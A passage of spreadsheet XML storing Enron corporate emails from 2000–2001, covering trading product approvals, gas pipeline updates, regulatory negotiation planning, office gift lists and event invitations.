    <t>frozenset({'wes.colwell@enron.com', 'rob.bradley@enron.com', 'alhamd.alkhayat@enron.com', 'paula.rieker@enron.com', 'rosalee.fleming@enron.com', 'mark.palmer@enron.com', 'karen.denne@enron.com', 'mark.koenig@enron.com', 'richard.causey@enron.com'})</t>
  </si>
  <si>
    <t>WSJ Article Mark to Market Memo</t>
  </si>
  <si>
    <t xml:space="preserve">Please see the revised memo from Steve Kean regarding WSJ article on Mark to _x000D_
Market Accounting._x000D_
</t>
  </si>
  <si>
    <t>Fri, 16 Jun 2000 07:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tana.jones@enron.com', 'susan.bailey@enron.com', 'susan.flynn@enron.com'})</t>
  </si>
  <si>
    <t>Do It Best Corp</t>
  </si>
  <si>
    <t>Please prepare a draft ISDA pursuant to the attached terms and deliver to _x000D_
Kevin Cordesman.  _x000D_
_x000D_
Thanks._x000D_
Paul</t>
  </si>
  <si>
    <t>Wed, 8 Nov 2000 02:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Christmas List</t>
  </si>
  <si>
    <t xml:space="preserve">Will Do , Vince_x000D_
                     _x000D_
_x000D_
                  Thanks_x000D_
                            _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
11/08/2000 10:42 AM_x000D_
To: Kevin G Moore/HOU/ECT@ECT_x000D_
cc: Shirley Crenshaw/HOU/ECT@ECT _x000D_
Subject: Re: Christmas List  _x000D_
_x000D_
Kevin,_x000D_
_x000D_
The donuts are a great idea. I think we should add Jeff and John as well _x000D_
(baskets)._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kevin G Moore_x000D_
11/07/2000 11:14 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT, Mike A Roberts/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Christmas List_x000D_
_x000D_
While the thought is still on my mind,so you want think I'm_x000D_
being selfish ._x000D_
_x000D_
What  I am thinking we could do is send the Move Team , Help Desk  and  _x000D_
Facilities_x000D_
_x000D_
complimentary donuts from the Research Group during the holiday season._x000D_
---------------------- Forwarded by Kevin G Moore/HOU/ECT on 11/07/2000 12:07 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Kevin G Moore_x000D_
11/07/2000 11:02 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT, Mike A Roberts/HOU/ECT@E_x000D_
cc:  _x000D_
Subject: Re: Christmas List  _x000D_
_x000D_
I sent the last e- mail before asking this question ._x000D_
Vince, _x000D_
What about Dave Delainey, John Lavorato and Jeff Shankman._x000D_
Please inform................_x000D_
_x000D_
_x000D_
_x000D_
Kevin G Moore_x000D_
11/07/2000 10:57 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT, Mike A Roberts/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Christmas List_x000D_
_x000D_
Hello Vince and Mike_x000D_
_x000D_
I want to keep you informed._x000D_
_x000D_
This year all baskets will be done in a timely manner._x000D_
On last year we were going through a major move therefore _x000D_
many people played key roles in keeping us together._x000D_
This year however , is a little different , as it is always nice_x000D_
to give unfortunately we can not give to everyone._x000D_
I am sending a lists of who we have so far._x000D_
_x000D_
_x000D_
There are a few names on the list that  I feel we should do something else _x000D_
for this year ._x000D_
under Shirley's list of names._x000D_
_x000D_
(not so expensive)_x000D_
_x000D_
They are : Move Team                                who?_x000D_
                     Mail Room                                    who?   _x000D_
                     Facilities Help Desk                  who?_x000D_
_x000D_
There are other tokens of appreciation that we can get for them._x000D_
_x000D_
Please note that you two are the only ones that have seen this e-mail so far_x000D_
I will need your approval for all baskets, however your input on the matter _x000D_
will be _x000D_
greatly appreciated.The list is not completed I am still waiting for _x000D_
additions._x000D_
_x000D_
_x000D_
                    _x000D_
                                              Thanks_x000D_
                                                          Kevin Moore_x000D_
                      _x000D_
_x000D_
        _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 04:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Yahoo! Real Estate</t>
  </si>
  <si>
    <t xml:space="preserve">here is what I found on taxes - does this represent all taxes or are ther _x000D_
others?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"K. Bass" &lt;daphneco64@bigplanet.com&gt; on 01/22/2001 11:46:59 AM_x000D_
Please respond to "K. Bass" &lt;daphneco64@bigplanet.com&gt;_x000D_
To: Eric Bass &lt;Eric.Bass@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Yahoo! Real Estate_x000D_
_x000D_
_x000D_
_x000D_
It looks like this property was bought for not less  than $300000.? I'll have _x000D_
to find out if I can the exact purchase  price.? I'll also try to find the _x000D_
tax info.? I'll send you the info  when I get it.? LU-M_x000D_
_x000D_
?_x000D_
http://216.128.3.78/yahoo/sales_results.asp?lat=0002973880&amp;long=0009538490&amp;loc_x000D_
ation=Alabama+St%2C+W&amp;Street=Alabama+St%2C+W&amp;City=Houston&amp;State=TX&amp;Zip=&amp;Range=_x000D_
1&amp;YearSale=1&amp;PriceLow=0&amp;PriceHigh=0&amp;SortBy=0_x000D_
 - Yahoo! Real Estate.url_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 15 Oct 2001 07:36:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rogers.herndon@enron.com'})</t>
  </si>
  <si>
    <t>RE: Retail Power Structuring - Confidential</t>
  </si>
  <si>
    <t xml:space="preserve">I would support this 100%.   It is consistent with the direction that Whalley, Lavo, and Delainey are headed with the retail risk management group._x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Herndon, Rogers  _x000D_
Sent:	Monday, October 15, 2001 7:52 AM_x000D_
To:	Presto, Kevin M.; Belden, Tim_x000D_
Subject:	Retail Power Structuring - Confidential_x000D_
_x000D_
Kevin &amp; Tim:_x000D_
_x000D_
Last week I spoke to Janet about the probable departure of Sean Holmes from EES Deal Management to EES Europe.  Janet discussed several alternatives for Deal Management and asked for my suggestions.  My suggestion is as follows:_x000D_
_x000D_
Berney Aucoin would assume oversight of all Retail Power Structurning and Deal Management activities.  Initially, keep Deal Management separate under Deb Merrill's direction and Structuring under Edith's direction.  DSM, LC, DG would probably need to fall under Berney as well.  I would anticipate that the functional separation that currently exists between Deal Managment and Structuring would begin to go away over the next 3 - 6 months as we intersperse our more experienced people and everyone in general gets up the curve.  Thus, I would expect that we could merge Deal Managemnt and Strcuturing into one group in the near future._x000D_
_x000D_
I spoke to Berney and he thinks this makes sense and is up for the job.  Edith is still planning to move into a commercial Origination role at year end but I believe we could have a replacement by then._x000D_
_x000D_
Janet and the EES group have definitely bought into this idea - I think they would like to implement.  Janet would expect dual reporting of the Group (to EES and EWS) and I indicated that, if implemented, I did not see a problem and as far as I was concerned nothing would change - Berney reiterated this directly._x000D_
_x000D_
I apoloigize if you are reading this feeling as though I have taken the liberty to suggest material changes without getting full buy-in, but 1) things aren't done and 2) I wanted to suggest something that I felt made sense before some alternative plan was proposed and in execution mode._x000D_
_x000D_
Please let me know what you think and whether you feel Lavo would have any problems._x000D_
_x000D_
Thanks,_x000D_
Rogers_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 21:23:09 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jsteffe@enron.com'})</t>
  </si>
  <si>
    <t>Expense Reports Awaiting Your Approval</t>
  </si>
  <si>
    <t xml:space="preserve">The following reports have been waiting for your approval for more than 4 days.  Please review._x000D_
_x000D_
Owner: Luiz T Maurer_x000D_
Report Name: LM 111301_x000D_
Days In Mgr. Queue: 13_x000D_
_x000D_
Owner: Susan J Mara_x000D_
Report Name: SJM11152001_x000D_
Days In Mgr. Queue: 10_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Aug 2001 11:59:36 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: CAN Gas Phy Basis West Products - PLEASE APPROVE</t>
  </si>
  <si>
    <t xml:space="preserve">Mark, as long as Melba has made the change requested below, can you please approve the products in the system?_x000D_
_x000D_
Thanks_x000D_
Greg_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lozano, Melba  _x000D_
Sent:	Tuesday, August 28, 2001 12:58 PM_x000D_
To:	Johnston, Greg_x000D_
Cc:	Taylor, Mark E (Legal)_x000D_
Subject:	RE: CAN Gas Phy Basis West Products - PLEASE APPROVE_x000D_
Importance:	High_x000D_
_x000D_
Greg,_x000D_
_x000D_
I will make that change.  Could you ask Mark Taylor to go ahead and approve it in the system?  He will do it once you give him the go ahead._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Melba_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Johnston, Greg  _x000D_
Sent:	Monday, August 27, 2001 9:34 AM_x000D_
To:	Lozano, Melba_x000D_
Cc:	Seib, Dianne_x000D_
Subject:	RE: CAN Gas Phy Basis West Products - PLEASE APPROVE_x000D_
_x000D_
Melba, I do not have "Test Applications" in my Start/Programs menu.  My only comment is that I would clarify the delivery point as Empress, Alberta rather than simply Empress.  Otherwise, the product descriptions look fine._x000D_
_x000D_
Greg_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lozano, Melba  _x000D_
Sent:	Tuesday, August 21, 2001 1:56 PM_x000D_
To:	Blumenthal, Jeff; Musch, Susan; Hayden, Frank; Moran, Tom; Taylor, Mark E (Legal); Seib, Dianne; Johnston, Greg_x000D_
Cc:	Lees, Lisa; Sever, Stephanie; Jones, Tana; Lambert, Karen; Lombardi, Kelly; Elledge, Susan; Sweitzer, Tara; Kenne, Dawn C.; Moorer, Torrey; Alatorre, Carlos; Renaud, Lindsay; Meredith, Kevin; Walker, Chris; Mandola, Teresa_x000D_
Subject:	CAN Gas Phy Basis West Products - PLEASE APPROVE_x000D_
_x000D_
_x000D_
Your review and approval of the following product types in the EOL Datamanager is needed (for directions on approval, please see steps for approval at the bottom of this e-mail). If you have any questions please call me at ext. 39555 or Chris Walker at ext. 37533   _x000D_
******** DO NOT APPROVE PRODUCT TYPES BETWEEN THE HOURS OF 6AM - 11AM***********_x000D_
_x000D_
Product Type(s): 	  	CAN Gas Phy Basis Firm West &lt;or=1Mo (2128)_x000D_
					CAN Gas Phy Basis Firm West &gt;1Mo&lt;1Yr (2129)_x000D_
_x000D_
Trader(s): 		     	Jon McKay_x000D_
					Chris Lambie_x000D_
					_x000D_
Description(s):	_x000D_
_x000D_
_x000D_
 CAN Gas PhyBasis EMPR                    Nov01           USD/MM_x000D_
_x000D_
A Canadian Gas Transaction with Enron Canada Corp., under which Seller shall sell and Buyer shall purchase a quantity of natural gas equal to the Daily Contract Quantity at the Contract Price on a firm basis.  The Contract Price shall be derived from the index, as adjusted by the price submitted by the Counterparty via the Website.  The Period of Delivery shall be from the Effective Date (first day of the term of the Transaction) through the Termination Date (last day of the term of the Transaction)._x000D_
The transaction is from the Effective Date to the Termination Date. The Effective Date is 01 Nov 2001. The Termination Date is 30 Nov 2001._x000D_
The transaction is for delivery at Empress._x000D_
The Index shall be the settlement price for the last scheduled Trading Day of the NYMEX Henry Hub Natural Gas Futures Contract._x000D_
The price is quoted in US Dollars per unit of volume, which will be the Contractual Currency._x000D_
The unit of measure against which the price is quoted shall be millions of British thermal units and the quantity shown shall be in millions of BTUs per day._x000D_
_x000D_
_x000D_
CAN Gas PhyBasis EMPR                    Nov01-Mar02     USD/MM_x000D_
A Canadian Gas Transaction with Enron Canada Corp., under which Seller shall sell and Buyer shall purchase a quantity of natural gas equal to the Daily Contract Quantity at the Contract Price on a firm basis.  The Contract Price shall be derived from the index, as adjusted by the price submitted by the Counterparty via the Website.  The Period of Delivery shall be from the Effective Date (first day of the term of the Transaction) through the Termination Date (last day of the term of the Transaction)._x000D_
The transaction is from the Effective Date to the Termination Date. The Effective Date is 01 Nov 2001. The Termination Date is 31 Mar 2002._x000D_
The transaction is for delivery at Empress._x000D_
The Index shall be the settlement price for the last scheduled Trading Day of the NYMEX Henry Hub Natural Gas Futures Contract._x000D_
The price is quoted in US Dollars per unit of volume, which will be the Contractual Currency._x000D_
The unit of measure against which the price is quoted shall be millions of British thermal units and the quantity shown shall be in millions of BTUs per day.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Partially Approved"_x000D_
select the product requiring review as stated in e-mail above_x000D_
Right "mouse" click on "properties" to view product set-up _x000D_
TO APPROVE:  Right mouse click on "Approved"_x000D_
_x000D_
_x000D_
 Thanks,_x000D_
Melba Lozano_x000D_
713-345-8986 _x000D_
713-646-8511 Fax_x000D_
713-698-4847 Pager_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 07:51:28 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'steve.swain@enron.com', 'c..williams@enron.com', "e-mail &lt;'.'mike@enron.com&gt;", 'jeff.dasovich@enron.com', 'michael.tribolet@enron.com', 'susan.mara@enron.com', 'wanda.curry@enron.com', 'd..steffes@enron.com', 'lisa.mellencamp@enron.com'})</t>
  </si>
  <si>
    <t>RE: Proposed SCE Negotiation Strategy - MEETING TODAY AT 2pm_x000D_
 Houston Time</t>
  </si>
  <si>
    <t>The dial in number for this conference call is:_x000D_
_x000D_
	Time:			2:00 p.m. CDT_x000D_
	Date:			TODAY, October 29, 2001_x000D_
	Dial in#:		1-877-232-4392_x000D_
	Host Code:		101971 (JIM STEFFES)_x000D_
	Participant Code:	603371_x000D_
_x000D_
Conference Room EB4746 has been reserved for this conference call._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Steffes, James D.  _x000D_
Sent:	Monday, October 29, 2001 8:12 AM_x000D_
To:	Dasovich, Jeff; Mara, Susan; Tribolet, Michael; Mellencamp, Lisa; Curry, Wanda; Williams, Robert C.; Mike Day (E-mail); Swain, Steve_x000D_
Cc:	Noske, Linda J.; Shapiro, Richard; Sanders, Richard B.; Sharp, Vicki_x000D_
Subject:	FW: Proposed SCE Negotiation Strategy - MEETING TODAY AT 2pm Houston Time_x000D_
_x000D_
To discuss this outline and our issues list, can people attend a 2pm Houston Time call.  The meet and confer may be on-going, but maybe either Jeff or Sue can jump off._x000D_
_x000D_
Linda Noske will be sending out a call-in number._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Steffes, James D.  _x000D_
Sent:	Monday, October 29, 2001 8:04 AM_x000D_
To:	Dasovich, Jeff; Mara, Susan; Tribolet, Michael; Mellencamp, Lisa; Curry, Wanda; Williams, Robert C.; Mike Day (E-mail)_x000D_
Cc:	Shapiro, Richard; Sanders, Richard B.; Sharp, Vicki_x000D_
Subject:	Proposed SCE Negotiation Strategy_x000D_
_x000D_
Following last week's meeting, here is my recommendation on how to proceed with SCE._x000D_
_x000D_
1.	Form Enron Negotiation Team_x000D_
_x000D_
	My recommendation is to use the same team we used with PG&amp;E + Jeff Dasovich.  My understanding was that Lisa M. was the lead negotiator - I would not change this.  Jeff should only be there to make introductions._x000D_
_x000D_
2.	Meet &amp; Confer (10/29)_x000D_
_x000D_
	Sue Mara and Jeff Dasovich will listen and report back to everyone on what happens.  _x000D_
_x000D_
3.	Reformed Stipulation_x000D_
_x000D_
	I would propose that we take a wait and see approach to this document.  Based on Dasovich's idea to get together with SCE on Thursday, maybe let this ride._x000D_
_x000D_
4.	Meeting_x000D_
_x000D_
	My understanding is that (Jeff D. please correct) SCE can meet with us this Thursday.  Can everyone make it that needs to be there?  Probably meet in California.  We should put the laundry list on the table._x000D_
_x000D_
Please let me know what else we need to discuss or if anyone disagrees._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jim</t>
  </si>
  <si>
    <t>Wed, 31 Oct 2001 09:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Operating Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Gerald,_x000D_
_x000D_
Here is the version with my marks_x000D_
_x000D_
Ken_x000D_
_x000D_
_x000D_
          _x000D_
 - BCCKOP BWGP Op Agreement kck rev 8-7-01.doc </t>
  </si>
  <si>
    <t>Thu, 1 Mar 2001 09:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>new things</t>
  </si>
  <si>
    <t>The new account number from Chelan to the ISO at Malin is 681456 Avista likes _x000D_
to sell MidC._x000D_
_x000D_
Dynegy has firm rights to export at Malin.  They can do a large amount on _x000D_
certain times and days.  Today I did this with them for $20.  Try to use this._x000D_
_x000D_
Real time phone number for Calpine is 713-830-8793.  Another new RT player._x000D_
_x000D_
Holden</t>
  </si>
  <si>
    <t>Wed, 15 Nov 2000 03:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'event@aei.org'})</t>
  </si>
  <si>
    <t>AEI Conference Invitation</t>
  </si>
  <si>
    <t xml:space="preserve">Please do not reply to this email._x000D_
------------------------------------------------------------------------------_x000D_
-----------------------------_x000D_
_x000D_
Lecture_x000D_
_x000D_
Jiang Zemin's Legacy: Beijing's Latest Policies on Reform, Succession, and _x000D_
Taiwan_x000D_
_x000D_
Wednesay, November 29, 2000_x000D_
Noon-2:00 p.m._x000D_
Wohlstetter Conference Center_x000D_
Twelfth Floor, AEI_x000D_
_x000D_
Willy Wo-lap Lam, former China editor of the South China Morning Post (the _x000D_
leading English daily in Hong Kong), will look at the possibilities for a _x000D_
more thorough going economic and political reform after President Jiang Zemin _x000D_
has retreated from the front line. Lam will examine the traits of the new _x000D_
generation of leaders and their likely policies toward the United States and _x000D_
Taiwan._x000D_
_x000D_
Following his lecture, Lam will answer questions about his prepared remarks. _x000D_
Lam has also kindly agreed to discuss with the audience his recent departure _x000D_
from the South China Morning Post and the climate of press freedom in Hong _x000D_
Kong._x000D_
_x000D_
11:30 a.m.   Registration_x000D_
_x000D_
Noon  Speaker:  Willy Wo-lap Lam_x000D_
_x000D_
1:15 p.m                 Discussion_x000D_
_x000D_
2:00  Adjournment_x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
--------------------------------------_x000D_
_x000D_
I will attend the Lecture._x000D_
_x000D_
Name_x000D_
_x000D_
Title_x000D_
_x000D_
Affiliation_x000D_
_x000D_
Address_x000D_
_x000D_
City/State/Zip_x000D_
_x000D_
Telephone_x000D_
_x000D_
Fax_x000D_
_x000D_
E-mail_x000D_
_x000D_
  ? Please check if this is a new address._x000D_
_x000D_
_x000D_
Click here www.aei.org/inv001129.htm to register online, or print this _x000D_
e-mail, fill it out and fax it to 202.862.7171.  Please do not reply to this _x000D_
e-mail.  If you do not wish to receive e-mail notifications and invitations _x000D_
in the future, please e-mail seminars@aei.org to have your name removed from _x000D_
our e-mail lists._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 12:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Internet Service is now available for ordering! ?As a Pilot 3 Invitee of the _x000D_
ClickAtHome program, you can now order your PC and Broadband Internet Service _x000D_
through the ClickAtHome Pilot website, which may be accessed at _x000D_
http://clickathomepilot.enron.com (launch through Internet Explorer only). ? _x000D_
All Pilot participants are encouraged to place their PC order by January _x000D_
25th. _x000D_
_x000D_
Many of our Internet Service vendors are ready to begin providing service to _x000D_
you today, while all vendors will be ready by late February. ? The _x000D_
ClickAtHome Internet Service Providers whom are currently available for _x000D_
internet service are: _x000D_
? _x000D_
_x000D_
Time-Warner in Houston, (cable modem) _x000D_
Kingwood Cable, (cable modem) _x000D_
AT&amp;T - Portland. ?(cable modem) _x000D_
_x000D_
MSN, providing both dial-up and DSL service nationwide, and Cox Cable - _x000D_
Omaha, providing cable modem service, ?will be available in late February. _x000D_
?We will provide further communication as soon as MSN and Cox Cable - Omaha _x000D_
orders can be placed. We appreciate your patience in advance. _x000D_
_x000D_
_x000D_
To pre-qualify and sign up for service in your area today with Time Warner _x000D_
Houston, Kingwood Cable or AT&amp;T- Portland, refer to _x000D_
http://clickathomepilot.enron.com for specific provider information and _x000D_
instructions on how to place your order. ?If you have problems launching the _x000D_
site, please copy and paste http://clickathomepilot.enron.com directly into _x000D_
Internet Explorer. _x000D_
_x000D_
The ClickAtHome Team is excited to bring you these options. _x000D_
_x000D_
ClickAtHome Team_x000D_
</t>
  </si>
  <si>
    <t>Wed, 19 Jul 2000 03:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>ENRON / HPL ACTUALS FOR JULY 18, 2000</t>
  </si>
  <si>
    <t xml:space="preserve">TECO TAP       10.000 / ENRON ; 65.000 / IFERC_x000D_
_x000D_
LS HPL LSK IC       30.000 / ENRON_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 10 Aug 2000 08:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'market.team@enron.com'})</t>
  </si>
  <si>
    <t>TW Bullets 8/11</t>
  </si>
  <si>
    <t xml:space="preserve">Interactive Open Season - TW held its third IOS of the year this week for _x000D_
14,000 MMBtu/d of space from East of Thoreau to PG&amp;E Topock.  Ten parties _x000D_
originally registered to bid of which 7 actually participated.  The high bid _x000D_
was Reliant at $.138._x000D_
_x000D_
Gallup Compressor - A meeting was held with Operations, Regulatory, and _x000D_
Facility Planning personnel to review the performance of the new compressor _x000D_
station.  Currently, the vibration level has increased.  The unit and lateral _x000D_
efficiency are a continuing concern.  Operations plans to pull the unit apart _x000D_
in early September for an evaluation.  At this time, the anticipated 30,000 _x000D_
MMBtu/d of "additional" capacity we hoped to have is now not available.  _x000D_
There is also concern that we may be unable to meet our currently subscribed _x000D_
FT obligation._x000D_
_x000D_
El Paso All American - We attended the El Paso Pipeline meeting this week as _x000D_
they described their FERC filing to begin the conversion of the All American _x000D_
Pipeline from oil to gas.  They reiterated several times to attending _x000D_
shippers that the project would not offer any incremental space to the main _x000D_
line.  El Paso's filing centers around the cost and fuel savings from _x000D_
decommissioning very old compressor equipment on their south system and _x000D_
replacing the capacity with the All American line.  The cost figures _x000D_
(conversion and acquisition) that El Paso filed tracked very closely with _x000D_
what Transwestern estimated in its evaluation of the pipe.  The in-service _x000D_
date is expected to be July 1, 2001._x000D_
_x000D_
Transport Options - TW Commercial reps met with marketing and regulatory _x000D_
personnel from Burlington Resources, Conoco, and Texaco this week to review _x000D_
the proposed Transport Options Tariff filing.  The meeting was very positive _x000D_
and constructive.  Several suggestions were made that led to the realization _x000D_
that the best course of action would be to delay the actual tariff filing and _x000D_
have a working group meeting in the Houston office.  Everyone agreed that as _x000D_
much preliminary work as possible should be done before the filing to make _x000D_
the whole process less contentious and to garner more customer support for _x000D_
the tariff.  We are trying to schedule the working group session for the _x000D_
third week of August._x000D_
_x000D_
Crawford Lateral - A line leak on the lateral this week reduced flow from _x000D_
50,000 MMBtu/d to zero.  Operations initially estimated 2-3 days of down time _x000D_
but actually only required 12 hours.  Approximately 55 feet of line was _x000D_
replaced._x000D_
_x000D_
El Paso Measurement Letter - Stan Horton forwarded the "mis-measurement" _x000D_
letter to El Paso management this week.  We will follow up in approximately _x000D_
two weeks if they don't respond sooner._x000D_
_x000D_
Operator Imbalances - Met with Market Services personnel to review operator _x000D_
imbalances across TW's system.  Marketing is supportive of Gas Control's _x000D_
efforts to limit the imbalances and begin allocations if operators schedule _x000D_
gas and then can't deliver.  With proactive balance management, there is _x000D_
opportunity to realize greater Park 'N Ride revenue._x000D_
_x000D_
TransColorado Shipper Meeting - Kevin Hyatt will be attending the _x000D_
TransColorado shipper meeting this week in Boulder.  Christine Stokes _x000D_
attended the Colorado Oil &amp; Gas Association meeting._x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Nov 2001 14:15:40 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'zwharton@dawray.com'})</t>
  </si>
  <si>
    <t>Quick help</t>
  </si>
  <si>
    <t xml:space="preserve">Hey honey, will you please call me when you get back to your desk?  I need_x000D_
to see what this attachment looks like when you open it.  Thanks, Wif_x000D_
_x000D_
-----Original Message-----_x000D_
From: Martin Cuilla [mailto:mcuilla@houston.rr.com]_x000D_
Sent: Monday, July 23, 2001 12:23 AM_x000D_
To: Zooey (Work)_x000D_
Subject: Jeff _x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 06:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Year 2000 Presentations</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 02/06/2001 _x000D_
02:30 PM ---------------------------_x000D_
_x000D_
_x000D_
Anita DuPont@ENRON_x000D_
02/06/2001 02:17 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Year 2000 Presentations_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 19 Jan 2001 05:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'donald.robinson@enron.com'})</t>
  </si>
  <si>
    <t>Montana System schedule has been curtailed......</t>
  </si>
  <si>
    <t>PGE@COLSTRIP DAILY-PGE-EPMI-LOUISIANA PACIFIC, 7MW FLAT.  LP deal #421598.1, _x000D_
at Montana System._x000D_
_x000D_
Louisiana Pacific was getting 7mw flat from our PGE @ Colstrip daily _x000D_
purchase.  As of HE23pst on 1/19 and through 1-23, they need only 4mw an _x000D_
hour.  _x000D_
Unfortunately, they called a little late for us to preschedule for 1/20-21, _x000D_
so Real time will need to sell off 3mw an hour from HE23pst on 1/19 through _x000D_
HE24 _x000D_
on 1/22 at Montana system.  The deal numbers for the PGE buy are as follows:_x000D_
_x000D_
1/19:  500047.1_x000D_
1/20:  500048.1 and 500047.1_x000D_
1/21:  500940.1_x000D_
1/22:  500936.1 and 500935.1_x000D_
_x000D_
The Lotus notes data base has not been changed for 1-19 but has been for _x000D_
1/20-22._x000D_
_x000D_
1/23 will be taken care of on preschedule._x000D_
_x000D_
Thank you._x000D_
_x000D_
Donald.</t>
  </si>
  <si>
    <t>Thu, 5 Apr 2001 14:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cbentsen@abigailkirsch.com'})</t>
  </si>
  <si>
    <t>RE: Interesting!!</t>
  </si>
  <si>
    <t xml:space="preserve">Yes indeed it was!!!_x000D_
Hi Kevin, Congratulations on the new house. I couldn't be happier for the two (four) of you.  Have a nice weekend and I hope to see you soon._x000D_
cbs_x000D_
_x000D_
-----Original Message-----_x000D_
From:	Kevin.Ruscitti@enron.com [SMTP:Kevin.Ruscitti@enron.com]_x000D_
Sent:	Wednesday, April 04, 2001 12:46 PM_x000D_
To:	Joan.Steinberg@MSDW.com_x000D_
Subject:	Interesting!!_x000D_
_x000D_
Thought you might find this interesting!!_x000D_
_x000D_
http://www.fortune.com/_x000D_
_x000D_
_x000D_
XXOOXXOO,_x000D_
_x000D_
Kevin_x000D_
</t>
  </si>
  <si>
    <t>Wed, 15 Nov 2000 03:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'louise.kitchen@enron.com', 'philippe.bibi@enron.com', 'greg.whalley@enron.com'})</t>
  </si>
  <si>
    <t>CommodityLogic Financial Invoice Exchange v1.0</t>
  </si>
  <si>
    <t xml:space="preserve">The FIX module v1.0 is now operational and meets all the specifications as _x000D_
shown in the FRS.  The team would be happy to show you a demo at your _x000D_
convenience, perhaps early next week.  We anticipate our back office using _x000D_
FIX in parallel with existing systems for December 2000, and then using FIX _x000D_
"under fire" for January 2001 invoices._x000D_
_x000D_
The demo uses actual data from Sempra, our largest volume natgas financial _x000D_
counterparty.  In about a minute, FIX is able to compare Enron data and _x000D_
Sempra data (received electronically as an excel spreadsheet and stored on a _x000D_
mini version of our Deal Database), immediately matching about 1450 of the _x000D_
1500 deals.  It then helps the user to manually match those 50 deals that the _x000D_
primary match engine could not.  This whole process, if it were purely _x000D_
manual, would take more than a day.  Using excel spreadsheets (and sort _x000D_
functions), Enron currently spends 4 to 8 hours per month matching Sempra _x000D_
invoices. FIX allows the user to perform all matching in about 10 minutes._x000D_
_x000D_
Our next deliverable is the Confirm Central module v1.0, due 1 December.  We _x000D_
anticipate delivering it on time, as we have with FIX._x000D_
_x000D_
_x000D_
All the best,_x000D_
_x000D_
Tom_x000D_
</t>
  </si>
  <si>
    <t>Fri, 28 Apr 2000 01:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tsurak@socalgas.com', 'rick.counihan@greenmountain.com', 'bdingwall@unitedgas.com', 'wreed@sempra.com', 'jteeter@sdge.com', 'pfair@sdge.com', 'paulamirault@aec.ca', 'rfoss@coral-energy.com', 'jharrigan@socalgas.com', 'dbarker@socalgas.com', 'jhay@sempra.com', 'rochmanm@cubjpa.org', 'bcherry@sempra.com', 'jmpa@dynegy.com', 'susan.scott@enron.com', 'kfreeman@sempra.com', 'rmorrow@socalgas.com', 'rochmanm@spurr.org', 'nmcvay@socalgas.com', 'johnj@bcjlaw.com', 'lschavrien@sempra.com', 'efong@sdge.com', 'porterdk@sce.com', 'kmccrea@sablaw.com', 'chj@aelaw.com', 'dfollett@sempra.com', 'plg@cpuc.ca.gov', 'burkee@cts.com', 'tbrill@sempra.com', 'etakemura@socalgas.com', 'rmp@cpuc.ca.gov', 'alexanms@sce.com', 'johnson_pamela@lacoe.edu', 'llorenz@socalgas.com', 'gwright@sempra.com', 'mgaines@socalgas.com', 'tp4lms@socalgas.com', 'craigc@calpine.com', 'lindseyhowdowning@dwt.com', 'sdavis@sdge.com', 'bsl@cpuc.ca.gov', 'jleslie@luce.com', 'rpurves@sdge.com', 'asmith@sempra.com', 'tomb@crossborderenergy.com', 'jdasovic@enron.com', 'rrawlings@socalgas.com', 'tp2jxv@socalgas.com', 'rbetonte@socalgas.com', 'ljhubbard@sempra.com', 'gcotton@sdge.com', 'redavis@sempra.com', 